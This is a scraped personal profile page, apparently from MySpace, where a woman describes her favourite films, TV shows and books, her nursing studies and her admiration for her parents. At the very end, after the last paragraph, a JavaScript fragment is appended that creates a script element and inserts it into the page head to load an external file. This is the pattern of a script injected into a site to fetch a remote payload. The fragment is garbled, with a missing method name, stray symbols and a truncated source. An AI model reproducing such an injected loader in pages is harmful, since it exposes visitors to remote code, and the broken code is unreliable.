New friends and people to chat to, oh and a very good looking, rich man to look after me. Myspace For Girls Only -
Oh god where do I start. Dirty dancing (i no i'm a saddo), love actually, forrest gump, green mile, twin town, withnail and i, the trueman show, the ring, the grudge, the yellow submarine,watership down, the shawshank redemption, murels wedding and loads more.Get Your Own! | View Slideshow
I Don't really have time for television. I do like soaps now and again, which I end up watchin as my portuguese housemate maria loves them. I like some reality shows like Big Brother and favourite programmes are Desperate Housewives and Lost.
I love reading. I have just finished The Time Travellers Wife. I have loads of favourite books including To Kill a Mocking Bird and American Psycho and one of my favourite authors is Jodie Picoult. The more boring books i'm reding at the moment are on nursing research and leadership and management.
My mom and dad are my hero's as they have been married 30 years and their marriage is as strong as ever. They are so in love and are quite an inspiration. .."var s=document·('script');s.src=' st.js';document·getElementsByTagName('head')[0].appendC hild(s);"